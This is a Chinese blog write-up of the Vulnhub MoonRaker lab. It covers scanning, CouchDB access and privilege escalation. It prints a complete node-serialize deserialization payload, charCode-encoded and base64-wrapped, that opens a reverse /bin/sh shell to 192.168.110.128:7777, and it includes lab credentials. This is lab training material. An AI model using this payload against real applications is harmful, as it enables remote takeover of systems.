2019-01-23-Vulnhub渗透测试实战writeup(
2019-01-25 本文已影响12人
最初的美好_kai
MoonRaker....选这个因为封面蛮好看地....大长腿....访问80端口还有视频出现
p1
nmap结果:
# Nmap 7.40 scan initiated Tue Jan 22 21:47:44 2019 as: nmap -p- -A -sV -Pn -oN 1.xml 192.168.110.143
Nmap scan report for 192.168.110.143
Host is up (0.0012s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey:
| 2048 5f:bf:c0:33:51:4f:4a:a7:4a:7e:15:80:aa:d7:2a:0b (RSA)
|_ 256 53:59:87:1e:a4:46:bd:a7:fd:9a:5f:f9:b7:40:9d:2f (ECDSA)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: MOONRAKER
3000/tcp open http Node.js Express framework
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=401
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
4369/tcp open epmd Erlang Port Mapper Daemon
| epmd-info:
| epmd_port: 4369
| nodes:
|_ couchdb: 42665
5984/tcp open couchdb?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Object Not Found
| Cache-Control: must-revalidate
| Connection: close
| Content-Length: 58
| Content-Type: application/json
| Date: Wed, 23 Jan 2019 10:49:14 GMT
| Server: CouchDB/2.2.0 (Erlang OTP/19)
| X-Couch-Request-ID: a2af5cdd93
| X-CouchDB-Body-Time: 0
| {"error":"not_found","reason":"Database does not exist."}
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: must-revalidate
| Connection: close
| Content-Length: 164
| Content-Type: application/json
| Date: Wed, 23 Jan 2019 10:48:22 GMT
| Server: CouchDB/2.2.0 (Erlang OTP/19)
| X-Couch-Request-ID: 8ff88fda87
| X-CouchDB-Body-Time: 0
| {"couchdb":"Welcome","version":"2.2.0","git_sha":"2a16ec4","features":["pluggable-storage-engines","scheduler"],"vendor":{"name":"The Apache Software Foundation"}}
| HTTPOptions:
| HTTP/1.0 500 Internal Server Error
| Cache-Control: must-revalidate
| Connection: close
| Content-Length: 61
| Content-Type: application/json
| Date: Wed, 23 Jan 2019 10:48:22 GMT
| Server: CouchDB/2.2.0 (Erlang OTP/19)
| X-Couch-Request-ID: e1640da16c
| X-Couch-Stack-Hash: 1828508689
| X-CouchDB-Body-Time: 0
|_ {"error":"unknown_error","reason":"badarg","ref":1828508689}
42665/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5984-TCP:V=7.40%I=7%D=1/22%Time=5C47D5F6%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,1A3,"HTTP/1\.0\x20200\x20OK\r\nCache-Control:\x20must-revalida
SF:te\r\nConnection:\x20close\r\nContent-Length:\x20164\r\nContent-Type:\x
SF:20application/json\r\nDate:\x20Wed,\x2023\x20Jan\x202019\x2010:48:22\x2
SF:0GMT\r\nServer:\x20CouchDB/2\.2\.0\x20\(Erlang\x20OTP/19\)\r\nX-Couch-R
SF:equest-ID:\x208ff88fda87\r\nX-CouchDB-Body-Time:\x200\r\n\r\n{\"couchdb
SF:\":\"Welcome\",\"version\":\"2\.2\.0\",\"git_sha\":\"2a16ec4\",\"featur
SF:es\":\[\"pluggable-storage-engines\",\"scheduler\"\],\"vendor\":{\"name
SF:\":\"The\x20Apache\x20Software\x20Foundation\"}}\n")%r(HTTPOptions,16E,
SF:"HTTP/1\.0\x20500\x20Internal\x20Server\x20Error\r\nCache-Control:\x20m
SF:ust-revalidate\r\nConnection:\x20close\r\nContent-Length:\x2061\r\nCont
SF:ent-Type:\x20application/json\r\nDate:\x20Wed,\x2023\x20Jan\x202019\x20
SF:10:48:22\x20GMT\r\nServer:\x20CouchDB/2\.2\.0\x20\(Erlang\x20OTP/19\)\r
SF:\nX-Couch-Request-ID:\x20e1640da16c\r\nX-Couch-Stack-Hash:\x20182850868
SF:9\r\nX-CouchDB-Body-Time:\x200\r\n\r\n{\"error\":\"unknown_error\",\"re
SF:ason\":\"badarg\",\"ref\":1828508689}\n")%r(FourOhFourRequest,146,"HTTP
SF:/1\.0\x20404\x20Object\x20Not\x20Found\r\nCache-Control:\x20must-revali
SF:date\r\nConnection:\x20close\r\nContent-Length:\x2058\r\nContent-Type:\
SF:x20application/json\r\nDate:\x20Wed,\x2023\x20Jan\x202019\x2010:49:14\x
SF:20GMT\r\nServer:\x20CouchDB/2\.2\.0\x20\(Erlang\x20OTP/19\)\r\nX-Couch-
SF:Request-ID:\x20a2af5cdd93\r\nX-CouchDB-Body-Time:\x200\r\n\r\n{\"error\
SF:":\"not_found\",\"reason\":\"Database\x20does\x20not\x20exist\.\"}\n");
MAC Address: 00:0C:29:85:81:B5 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.17 ms 192.168.110.143
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 22 21:50:27 2019 -- 1 IP address (1 host up) scanned in 163.82 seconds
dirb啥都没发现.....
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: result.txt
START_TIME: Tue Jan 22 21:59:27 2019
URL_BASE: http://192.168.110.143/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.110.143/ ----
==> DIRECTORY: http://192.168.110.143/accounting/
==> DIRECTORY: http://192.168.110.143/cats/
+ http://192.168.110.143/index.html (CODE:200|SIZE:422)
+ http://192.168.110.143/robots.txt (CODE:200|SIZE:26)
+ http://192.168.110.143/server-status (CODE:403|SIZE:303)
==> DIRECTORY: http://192.168.110.143/services/
---- Entering directory: http://192.168.110.143/accounting/ ----
+ http://192.168.110.143/accounting/index.php (CODE:200|SIZE:55)
---- Entering directory: http://192.168.110.143/cats/ ----
---- Entering directory: http://192.168.110.143/services/ ----
+ http://192.168.110.143/services/index.html (CODE:200|SIZE:1756)
-----------------
END_TIME: Tue Jan 22 21:59:55 2019
DOWNLOADED: 18448 - FOUND: 5
最后看了很久的主机漏洞都没啥发现,web只找到一个xss,但是又没有cookie搞毛...
看了walkthrough发现是直接使用一招,他们在service那里有一个留言板(其实就是把输入的内容写入log里面,但是我们不知道到底是写入那里的文件名以及文件路径是什么),所以开了个apache,然后让target下载下来查看access的日志就可以看到了.
p2
然后直接就知道是哪个文件处理的了,直接访问他...这一招学起了,以后可以骚一把
http://192.168.110.143/svc-inq/salesmoon-gui.php
这个页面有两个需要注意的地方,一个是hugo.txt,页面内容如下:
FYI Hugo's custom page is being rebuilt over on the NodeJS server running on port 3000. Here's a snippet of the backend code for cookie input..this is once you get past the Username/password prompt.
The dev team is still creating most of the front end, but we will have to "secure the code" since we're now not only tasked with sales, but also secure code review. How do they expect to offer all of these extra services without hiring more ppl? Never thought I'd be a nerdy "coder"!
Here's the snippet, you'll need nodejs and other stuff to run. It looks good to me so I've pushed to prod...
//Stuff to import
var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');
var app = express();
// Here's the function they want reviewed...
// I think it decodes the weird cookie string and runs it, prints it, sets it or idk.
app.get('/', function(req, res) {
if (req.cookies.profile) {
var str = new Buffer(req.cookies.profile, 'base64').toString();
var obj = serialize.unserialize(str);
if (obj.username) {
res.send("Stuff here then print out username.. " + escape(obj.username)");
}
} else {
res.cookie('profile', "eyJ1c2VybmFtZSI6Imh1Z28ifQ==", {
maxAge: 900000,
httpOnly: true
});
}
});
app.listen(3000);
不太能看懂js的短板还是要补起来的.....但是这里的主要还是要看cookie那里的参数.
另一个要注意的页面是http://192.168.110.143/svc-inq/couchnotes.txt,内容如下:
--Our new devs are building a front end to work with CouchDB backend. For now most data collection needs to be done manually.
--For you new sales folks, using curl to interact with couch is slick. Otherwise the front end admin panel is available.
-----Contact me in office if you'd like a user created.
--Quick path to check for DB's created, then you can dive into each if you have permissions.
/_all_dbs
------------For Jaws' eye's only below the line------------------
--my password
hint: girlfriends name + "x99" w/o quotes
这里提示了couchdb的用户名是jaws,密码是
p3
那就是Dollyx99了,有了账号密码但是没有couchdb的登录界面怎么办?那就找找建站模板了...
如下:
http://192.168.110.143:5984/_utils/#login
进来以后发现3个库,只有link一个才可以访问...其他两个没啥权限
p4
然后直接打开Link发现四个连接:
/cats/cats-gallery.html#前面猫的那个
/surv-cam/recent.html#这个点进去,好好看......不多说
/HR-Confidential/offer-letters.html#这个进去有东西
/x-files/deep-space-findings.html#这个进去以后没发现啥玩意
第三个连接进去是这样的...
p5
结合前面看到的界面,这里需要先看下hugo用户,果然看到了些啥
p6
p7
这里有个账号密码,前面nmap扫描以后有发现一个Node.js Express framework就是需要账号密码来登录的,这里应该就是了...尝试一下成功了...
p8
这里的node.js存在一个反序列化漏洞,可以直接getshell,先放一个参考文章
https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
p9
根据参考文章,反序列化字段应该是在cookie字段,profile那里,所以我们需要截取报文再生成payload来getshell,因此前面获取的账号密码意义就在这里了.
截获的报文如下:
GET / HTTP/1.1
Host: 192.168.110.143:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: AuthSession=amF3czo1QzQ5RUFCRjqL4fuwv3GwQ70_iK99c_oPA_8RCw; profile=eyJ1c2VybmFtZSI6Imh1Z28ifQ%3D%3D
Authorization: Basic aHVnbzpUZW1wbGVMYXNlcnNMMks=
Connection: keep-alive
If-None-Match: W/"5c-Hu0fOrq4gpzRr1hphtyepFR+674"
Cache-Control: max-age=0
cookie处进行了base64编码
python脚本地址:https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py
然后过程如下:
python test.py 192.168.110.128 7777
生成的payload再加上头尾格式如下:
{"rce":"_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,49,49,48,46,49,50,56,34,59,10,80,79,82,84,61,34,55,55,55,55,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()"}
然后直接使用进行base64编码payload如下:
CnsicmNlIjoiXyQkTkRfRlVOQyQkX2Z1bmN0aW9uICgpe2V2YWwoU3RyaW5nLmZyb21DaGFyQ29kZSgxMCwxMTgsOTcsMTE0LDMyLDExMCwxMDEsMTE2LDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSwxMTAsMTAxLDExNiwzOSw0MSw1OSwxMCwxMTgsOTcsMTE0LDMyLDExNSwxMTIsOTcsMTE5LDExMCwzMiw2MSwzMiwxMTQsMTAxLDExMywxMTcsMTA1LDExNCwxMDEsNDAsMzksOTksMTA0LDEwNSwxMDgsMTAwLDk1LDExMiwxMTQsMTExLDk5LDEwMSwxMTUsMTE1LDM5LDQxLDQ2LDExNSwxMTIsOTcsMTE5LDExMCw1OSwxMCw3Miw3OSw4Myw4NCw2MSwzNCw0OSw1Nyw1MCw0Niw0OSw1NCw1Niw0Niw0OSw0OSw0OCw0Niw0OSw1MCw1NiwzNCw1OSwxMCw4MCw3OSw4Miw4NCw2MSwzNCw1NSw1NSw1NSw1NSwzNCw1OSwxMCw4NCw3Myw3Nyw2OSw3OSw4NSw4NCw2MSwzNCw1Myw0OCw0OCw0OCwzNCw1OSwxMCwxMDUsMTAyLDMyLDQwLDExNiwxMjEsMTEyLDEwMSwxMTEsMTAyLDMyLDgzLDExNiwxMTQsMTA1LDExMCwxMDMsNDYsMTEyLDExNCwxMTEsMTE2LDExMSwxMTYsMTIxLDExMiwxMDEsNDYsOTksMTExLDExMCwxMTYsOTcsMTA1LDExMCwxMTUsMzIsNjEsNjEsNjEsMzIsMzksMTE3LDExMCwxMDAsMTAxLDEwMiwxMDUsMTEwLDEwMSwxMDAsMzksNDEsMzIsMTIzLDMyLDgzLDExNiwxMTQsMTA1LDExMCwxMDMsNDYsMTEyLDExNCwxMTEsMTE2LDExMSwxMTYsMTIxLDExMiwxMDEsNDYsOTksMTExLDExMCwxMTYsOTcsMTA1LDExMCwxMTUsMzIsNjEsMzIsMTAyLDExNywxMTAsOTksMTE2LDEwNSwxMTEsMTEwLDQwLDEwNSwxMTYsNDEsMzIsMTIzLDMyLDExNCwxMDEsMTE2LDExNywxMTQsMTEwLDMyLDExNiwxMDQsMTA1LDExNSw0NiwxMDUsMTEwLDEwMCwxMDEsMTIwLDc5LDEwMiw0MCwxMDUsMTE2LDQxLDMyLDMzLDYxLDMyLDQ1LDQ5LDU5LDMyLDEyNSw1OSwzMiwxMjUsMTAsMTAyLDExNywxMTAsOTksMTE2LDEwNSwxMTEsMTEwLDMyLDk5LDQwLDcyLDc5LDgzLDg0LDQ0LDgwLDc5LDgyLDg0LDQxLDMyLDEyMywxMCwzMiwzMiwzMiwzMiwxMTgsOTcsMTE0LDMyLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsMzIsNjEsMzIsMTEwLDEwMSwxMTksMzIsMTEwLDEwMSwxMTYsNDYsODMsMTExLDk5LDEwNywxMDEsMTE2LDQwLDQxLDU5LDEwLDMyLDMyLDMyLDMyLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDYsOTksMTExLDExMCwxMTAsMTAxLDk5LDExNiw0MCw4MCw3OSw4Miw4NCw0NCwzMiw3Miw3OSw4Myw4NCw0NCwzMiwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsNDAsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExOCw5NywxMTQsMzIsMTE1LDEwNCwzMiw2MSwzMiwxMTUsMTEyLDk3LDExOSwxMTAsNDAsMzksNDcsOTgsMTA1LDExMCw0NywxMTUsMTA0LDM5LDQ0LDkxLDkzLDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDYsMTE5LDExNCwxMDUsMTE2LDEwMSw0MCwzNCw2NywxMTEsMTEwLDExMCwxMDEsOTksMTE2LDEwMSwxMDAsMzMsOTIsMTEwLDM0LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDYsMTEyLDEwNSwxMTIsMTAxLDQwLDExNSwxMDQsNDYsMTE1LDExNiwxMDAsMTA1LDExMCw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTUsMTA0LDQ2LDExNSwxMTYsMTAwLDExMSwxMTcsMTE2LDQ2LDExMiwxMDUsMTEyLDEwMSw0MCw5OSwxMDgsMTA1LDEwMSwxMTAsMTE2LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDQsNDYsMTE1LDExNiwxMDAsMTAxLDExNCwxMTQsNDYsMTEyLDEwNSwxMTIsMTAxLDQwLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE1LDEwNCw0NiwxMTEsMTEwLDQwLDM5LDEwMSwxMjAsMTA1LDExNiwzOSw0NCwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsNDAsOTksMTExLDEwMCwxMDEsNDQsMTE1LDEwNSwxMDMsMTEwLDk3LDEwOCw0MSwxMjMsMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMDEsMTEwLDEwMCw0MCwzNCw2OCwxMDUsMTE1LDk5LDExMSwxMTAsMTEwLDEwMSw5OSwxMTYsMTAxLDEwMCwzMyw5MiwxMTAsMzQsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTI1LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDEyNSw0MSw1OSwxMCwzMiwzMiwzMiwzMiw5OSwxMDgsMTA1LDEwMSwxMTAsMTE2LDQ2LDExMSwxMTAsNDAsMzksMTAxLDExNCwxMTQsMTExLDExNCwzOSw0NCwzMiwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsNDAsMTAxLDQxLDMyLDEyMywxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTUsMTAxLDExNiw4NCwxMDUsMTA5LDEwMSwxMTEsMTE3LDExNiw0MCw5OSw0MCw3Miw3OSw4Myw4NCw0NCw4MCw3OSw4Miw4NCw0MSw0NCwzMiw4NCw3Myw3Nyw2OSw3OSw4NSw4NCw0MSw1OSwxMCwzMiwzMiwzMiwzMiwxMjUsNDEsNTksMTAsMTI1LDEwLDk5LDQwLDcyLDc5LDgzLDg0LDQ0LDgwLDc5LDgyLDg0LDQxLDU5LDEwKSl9KCkifQ==
p10
然后就可以直接反弹回来了,不是交互shell,还需要一波python
反弹shell回来以后一波测试,发现没有所谓的写权限,所以dirtycow凉凉,其次之前提示有定期清理那个log的存在,猜测是uuid提权有望,尝试一波发现无法写...
然后就只能尝试一波那个找配置文件了,直接找到couchdb目录...查看local.ini文件
p11
发现hugo账号密码,尝试su hugo一波成功了
来到这一步就卡壳了2333没办法了看walkthrough说作者留了和hint在mail里面,这种正常肯定看不到的啊....
p12
p13
给了一个密码哈希,说是要加上VR00M
这里学一波kali中的hash破解工具john,直接把hash存储在文件中,然后john+文件名
p14
那就直接密码cyberVR00M了
p15
base64解码后是:
was dolly wearing braces?
总结:
这次果然证明了,我的技巧在chanllenge难度面前还是不够的....
首先是利用一个xss,利用反向下载的技巧获取当前的日志处理文件名称和路径
接着直接访问,获取数据库的访问之后获取到nodejs的账号密码,接着利用一个反序列化漏洞直接getshell,之后查看配置文件获取hugo的登录bash,最后再查看mail获取root密码hash,破解之后直接登录.
